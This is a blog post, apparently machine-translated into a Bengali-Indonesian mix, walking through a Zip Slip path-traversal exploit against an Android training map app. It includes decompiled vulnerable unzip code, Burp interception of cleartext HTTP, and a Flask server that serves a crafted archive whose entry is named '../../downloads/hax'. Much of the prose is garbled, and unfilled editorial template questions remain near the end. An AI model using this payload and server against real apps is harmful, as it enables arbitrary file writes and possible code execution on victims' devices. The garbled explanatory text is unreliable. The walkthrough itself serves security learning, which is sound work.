paint-brush
পূর্বে অপ্রকাশিত ত্রুটি হ্যাকারদের নির্দোষ চেহারার ফাইলগুলির মাধ্যমে লক্ষ লক্ষ সিস্টেম হাইজ্যাক করতে দেয়দ্বারা@psychopper
540 পড়া
540 পড়া

পূর্বে অপ্রকাশিত ত্রুটি হ্যাকারদের নির্দোষ চেহারার ফাইলগুলির মাধ্যমে লক্ষ লক্ষ সিস্টেম হাইজ্যাক করতে দেয়

দ্বারা Fikri Azhar
Fikri Azhar HackerNoon profile picture

Fikri Azhar

@psychopper

Cyber Security Enthusiast

13 মিনিট read2025/01/28
Read on Terminal Reader
Read this story in a terminal
Print this story
tldt arrow
bn-flagBN
এই গল্পটি বাংলায় পড়ুন!
en-flagEN
Read this story in the original language, English!
ru-flagRU
Прочтите эту историю на русском языке!
es-flagES
Lee esta historia en Español!
fr-flagFR
Lisez cette histoire en Français!
ja-flagJA
この物語を日本語で読んでください!
rw-flagRW
Soma iyi nkuru muri Kinyarwanda!
uz-flagUZ
Bu hikoyani o'zbek tilida o'qing!
eu-flagEU
Irakurri ipuin hau euskaraz!
km-flagKM
អានរឿងនេះជាភាសាខ្មែរ!
it-flagIT
Leggi questa storia in italiano!
ln-flagLN
Tanga lisolo oyo na lingala!
mn-flagMN
Энэ түүхийг монгол хэлээр уншаарай!
BN

অতিদীর্ঘ; পড়তে

জিপ স্লিপ একটি গুরুতর দুর্বলতা যা সংরক্ষণাগার নিষ্কাশন প্রক্রিয়ায় ব্যাপক। 5 জুন, 2018-এ প্রকাশের আগে Snyk সিকিউরিটি টিম দ্বারা দুর্বলতাটি আবিষ্কৃত এবং দায়িত্বের সাথে প্রকাশ করা হয়েছিল৷ সমস্যাটি HP, Amazon, Apache, Pivotal এবং আরও অনেকের মতো বড় কোম্পানিগুলির মালিকানাধীন সহ হাজার হাজার প্রকল্পকে প্রভাবিত করে৷
featured image - পূর্বে অপ্রকাশিত ত্রুটি হ্যাকারদের নির্দোষ চেহারার ফাইলগুলির মাধ্যমে লক্ষ লক্ষ সিস্টেম হাইজ্যাক করতে দেয়
Fikri Azhar HackerNoon profile picture
Fikri Azhar

Fikri Azhar

@psychopper

Cyber Security Enthusiast

0-item

STORY’S CREDIBILITY

Original Reporting

Original Reporting

This story contains new, firsthand information uncovered by the writer.



ZIP SLIP দুর্বলতা কি?

জিপ স্লিপ একটি গুরুতর দুর্বলতা যা আর্কাইভ নিষ্কাশন প্রক্রিয়ায় ব্যাপক, আক্রমণকারীদের সিস্টেমে যেকোনো ফাইল লিখতে দেয়। সাধারণত, এর ফলে RCE (রিমোট কোড এক্সিকিউশন) হয়। 5 জুন, 2018-এ প্রকাশের আগে Snyk সিকিউরিটি টিম দ্বারা দুর্বলতাটি আবিষ্কৃত এবং দায়িত্বের সাথে প্রকাশ করা হয়েছিল৷ সমস্যাটি HP, Amazon, Apache, Pivotal এবং আরও অনেকের মতো বড় কোম্পানিগুলির মালিকানাধীন সহ হাজার হাজার প্রকল্পকে প্রভাবিত করে৷


জিপ স্লিপকে বিশেষভাবে তৈরি করা আর্কাইভের মাধ্যমে ব্যবহার করা হয় ফাইলের নামের সাথে যাতে ডিরেক্টরি ট্রাভার্সাল (eg, ../../evil.sh) অন্তর্ভুক্ত থাকে। এই দুর্বলতা অনেক আর্কাইভ ফরম্যাটে ঘটতে পারে, যেমন tar, ghz, jar, war, cpio, apk, rar, এবং 7z।


এই দুর্বলতার মূল হল ডিরেক্টরি ট্রাভার্সাল, যেখানে একজন আক্রমণকারী লক্ষ্য ফোল্ডারের বাইরে সিস্টেম ফাইলগুলির অংশগুলি অ্যাক্সেস করতে পারে। আক্রমণকারী তখন এক্সিকিউটেবল ফাইলটিকে ওভাররাইড করতে পারে এবং এটিকে দূরবর্তীভাবে চালাতে পারে, অথবা সিস্টেম বা ব্যবহারকারীর ফাইলটি কল করার জন্য অপেক্ষা করতে পারে, যাতে তারা শিকারের মেশিনে কমান্ড চালাতে পারে। এছাড়াও, এই দুর্বলতা কনফিগারেশন ফাইল বা অন্যান্য সংবেদনশীল সংস্থানগুলি ওভাররাইট করে ক্ষতির কারণ হতে পারে এবং ব্যবহারকারীর মেশিন এবং সার্ভারে উভয়ই শোষিত হতে পারে।


কীভাবে জিপ স্লিপ ব্যবহার করবেন

জিপ স্লিপ দূর্বলতা ব্যবহার করার জন্য কল করুন এই অ্যান্ড্রয়েডের জন্য ব্যবহার করার জন্য ব্যবহার করার জন্য ব্যবহার করার জন্য ব্যবহার করা যেতে পারে।


image

Google Maps-এর জন্য অ্যাপলিকেশনের জন্য বেছে নেওয়া হয়েছে স্থানীয় মানচিত্রগুলি ডাউনলোড করার জন্য রিসোর্স বাটনে ক্লিক করুন + ডি লেয়ার।


Tetapi sebelum kita analysis Flow dari cara kerja apk ini kita harus memakai apk Burpsuite. Untuk yang belum tau apk Burpsuite adalah applikasi yang digunakan untuk menguji kemanan applicasi web dan mobile. আলত ini berfungsi untuk mendeteksi kerentanan, menganalisis, dan mengatasi masalah kemanan .


আপনি এই লিঙ্কে ক্লিক করার জন্য টুল ডাউনলোড করতে পারেন:

https://portswigger.net/burp/communitydownload


Berikut adalah hasil intercept ketika kita mau menambahkan maps nya, dan bisa di analysis kalau apk ini rentan karena permintaan API nya masih memakai protocol HTTP টিডাক মেঙ্গগুনাকান HTTPS yang dimana memungkinkan অ্যাটাকার ট্রাফিক ট্রাফিকের জন্য তারপরে,তাপী জুগ ম্যানিপুলেট/মেমোডিফিকেশনের অনুরোধ এবং সাড়া ক্লিয়ারটেক্সট


Dan Fakta nya bahwa ketika masih memakai HTTP dapat membuka seluruh এলাকায় permukaan serangan, Contohnya jenis serangan yang sedang kita buat ini.


image


Bisa dilihat juga menggunakan Tools JADX untuk melakukan reverse Engineering yang dimana kita bisa melakukan static analysis pada sebuah aplikasi memungkinkan penyerang untuk memahami struktur dan logika aplikasi.


network_security_config.xml এপ্লিকেশন ফাইলের বিশ্লেষণের জন্য সেট করুন cleartextTrafficPermitted="true" । Sehingga konfigurasi ini mengizinkan clear text ট্রাফিক di setiap permintaan untuk domain yang diizinkan. টেটাপি অ্যাপাক ডোমেন ini benar-benar digunakan untuk CleartextTraffic tersebut. Bisa saja ini dibuat hanya untuk pengujian / tidak digunakan dalam production.


image


ini adalah Hasil intercept ketika kita mendownload মানচিত্র nya yang dimana dia mengambil file ZIP dengan format .ghz


image




image

ড্যান মেনকোবা ফাইল ডাউনলোড করুন .GHz সেকার ম্যানুয়াল ডেনগান কপাস ডি ল্যাপটপ। জিপ টারসেবুট আইএসআই ফাইল তৈরি করুন।


Untuk mengetahui lokasi data yang di unzip oleh aplikasi kita bisa gunakan কমান্ড find / | grep australia oceania_nauru.map di adb শেল মোবাইল এমুলেটর nya dan pastikan juga kalau kita sudah memiliki akses root di emulatornya.





image
Bisa dilihat kalau path file yang di unzip ada di :

/data/media/0/Android/data/io.hextree.pocketmaps/files/Download/pocketmaps/maps/

Ini juga menunjukkan Kepada kita bahwa aplikasi benar-benar meng-unzip ফাইল ম্যাপ nya.





দুর্বলতা বিশ্লেষণ পর্যায়


আমার কিতা লিখতে লিখতে লিখতে হবে সালিসী ফাইলের জন্য দুর্বলতা ডালম অ্যাপলিকেশন, সেপারটি ইয়াং সুডাহ কিতা কেতাহুই ইস্যু এবং জিপ ম্যাপ হ্যান্ডলিং ফাইল করার জন্য। স্থির বিশ্লেষণের জন্য আপনার কীওয়ার্ড: ZipEntry এবং মেনগেটাহুই ক্লাস কোড কোন মেং-হ্যান্ডেল ফাইল জিপ মানচিত্র.


image


image

Sebelum kita বিশ্লেষণ লেবিহ ডালাম কোড nya, Saa akan mengikuti panduan dari snyk team untuk mencari kode yang sering diimplementasi tetapi rentan. বেরিকুত আদালাহ সালাহ সাতু পান্ডুয়ান ইয়াং খুসুস অন্টুক বাহাসা জাভা, বিসা বাকা লেবিহ লানজুত: https://github.com/snyk/zip-slip-vulnerability

পেঞ্জেলাসন:

কোড বেরিকুট ভাড়া তেরহাদপ সেরাঙ্গন জিপ স্লিপ কারেন টিডাক মেলাকুকান বৈধতাসি ইয়াং মেমাদাই তেরহাদপ জালুর ফাইল ডালাম আরসিপ জিপ সেবেলাম মেঙ্গেকস্ট্রাকনিয়া। sini, e.getName() ফাইলের নাম ফাইলের সাথে সম্পর্কিত জালুর রিলাটিফ ইয়াং বারবাহায়া, সেপারটি ../../malicious.sh . Ii berarti file tersebut bisa diekstrak di luar destinationDir yang ditentukan.

 InputStream input = zip.getInputStream(e); IOUtils.copy(input, write(f));

সেটেলাহ ফাইল ডিবুআট, কনটেন ফাইল ল্যাংসুং ডিসালিন ট্যানপা মেমেরিকসা জালুর কেলুরান আপাকাহ সুদাহ আমান আতউ টিডাক। Jika jalur tersebut menuju ke lokasi berbahaya, seperti direktori root system atau ফোল্ডার lain yang seharusnya tidak dapat diakses oleh aplikasi, itu bisa Sangat Berbahaya.


Karena kita sudah mengetahui kode yang rentan sesuai panduan mari kita analysis code di apk nya:

image
পেম্বুতান পথ তানপা ভ্যালিদাসিঃ

 String str3 = file.getAbsolutePath() + File.separator + nextEntry.getName();

আপনি, জলের ফাইল ( str3 ) ডাইরেক্টরির জন্য আপনার পথ নির্দেশ করতে পারেন ( file.getAbsolutePath() ) নাম এন্ট্রি জিপ ( nextEntry.getName() )। নামুন, nextEntry.getName() bisa berisi elemen path berbahaya seperti ../../ , yang dapat menyebabkan file diekstrak di luar direktori yang dimaksud ( file )।

Setelah path dibuat, ফাইল বা ডাইরেক্টরি ডিবুট ল্যাংসুং:

 if (nextEntry.isDirectory()) { new File(str3).mkdir(); } else { e(zipInputStream, str3, eVar, "" + i3 + " Unzipping " + str2, size, null); }

ইনি মেমবুট বা মেনুলিস ফাইল টানপা মেমাস্তিকান বাহওয়া str3 অ্যাডলাহ জলুর ইয়াং আমান।




শোষণ পর্যায়

অটুক দি তাহাপ ইনি সায়া menyiapkan 2 hal untuk পরিবেশ সেরাঙ্গন nya:

  1. ডায়নামিক HTTP মকিং এনভায়রনমেন্ট সেটআপ করুন : এক্সটেনশন HTTP মক ড্যারি burpsuite ini dapat mengubah সাড়া জারি করে এপ্লিকেশন করার নিয়ম মেনকোকোকন নিয়মগুলি এবং http history input manual । আপনি আপনাকে নির্দেশ করতে পারেন যে আপনার উত্তরের জন্য আপনাকে URL-এ পুনঃনির্দেশ করতে হবে, HTTP উপহাসের জন্য রিয়েল টাইম ব্যবহার করতে হবে।

    image


2. স্থানীয় সার্ভার এনভায়রনমেন্ট সেট-আপ করুন : কারেন সেটআপ অনুরোধটি আপনার কাছে আপনার স্থানীয় সার্ভারকে দূষিত পুনঃনির্দেশ করতে পারে এবং দূষিত জিপ করতে পারে না:

 from flask import Flask, jsonify, send_file import zipfile, io app = Flask(__name__) @app.route('/map.json') def map_json(): response = { "maps-0.13.0_0-path": "maps", "maps-0.13.0_0": [ {"name": "maliciousmaps_USA", "size": "300k", "time": "2025-01"}, ] } return jsonify(response) @app.route('/map.ghz') def map_archive(): # Create a ZipFile object zip_buffer = io.BytesIO() filename = "../../downloads/hax" with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zip_file: content = "You have been hacked" zip_file.writestr(filename, content) zip_buffer.seek(0) return send_file( zip_buffer, mimetype='application/zip', as_attachment=True, download_name='map.ghz' ) if __name__ == '__main__': app.run(debug=True, port=1234)













আপনি কিভাবে সাইবার সিকিউরিটিতে এলেন?

কেন আপনি ডিজিটাল নিরাপত্তা একটি কর্তৃপক্ষ?

এই স্থান আপনার দক্ষতা কি?

সাইবার ক্রাইম ক্রমাগত বিকশিত হচ্ছে। সাইবার ক্রাইমের জগতে নতুন কী আছে যা হ্যাকারনুন সম্প্রদায় ডিজিটাল প্রতারকদের বিরুদ্ধে লড়াইয়ে জানতে পারে?

কোন উদীয়মান সাইবারসিকিউরিটি প্রবণতা বা হুমকি আছে যা পাঠকদের সন্ধান করা উচিত?

ট্রোজান, ম্যালওয়্যার, স্পাইওয়্যার এবং আরও অনেক কিছু। আমাদের প্রিয় পিসিগুলিকে সংক্রামিত করতে এবং আমাদের তথ্য গ্রহণ করতে পারে এমন সাম্প্রতিক বাগগুলির স্কুপ কী? এটা সেখানে থামে না, যদিও; আমাদের জানা যাক অন্যান্য সাইবার কুফল কি আছে!

আপনি কীভাবে অনলাইনে নিজেকে নিরাপদ রাখবেন?

আপনি কীভাবে দুর্বলতার সাথে নতুন প্রযুক্তি নেভিগেট করছেন? স্মার্ট হোমস, এআই, এবং ইন্টারনেট অফ থিংস এর দুর্বলতা রয়েছে।

অতিরিক্ত চিন্তা


উপসংহার


আপনার খসড়া লেখা এবং জমা দেওয়ার আগে দয়া করে উপরের সমস্ত তথ্য মুছে ফেলার বিষয়টি নিশ্চিত করুন৷ ধন্যবাদ!


L O A D I N G
. . . comments & more!

About Author

Fikri Azhar HackerNoon profile picture
Fikri Azhar@psychopper
Cyber Security Enthusiast

আসে ট্যাগ

এই নিবন্ধটি উপস্থাপন করা হয়েছে...

Read on Terminal Reader
Read this story in a terminal
 Terminal
Read this story w/o Javascript
Read this story w/o Javascript
 Lite
X REMOVE AD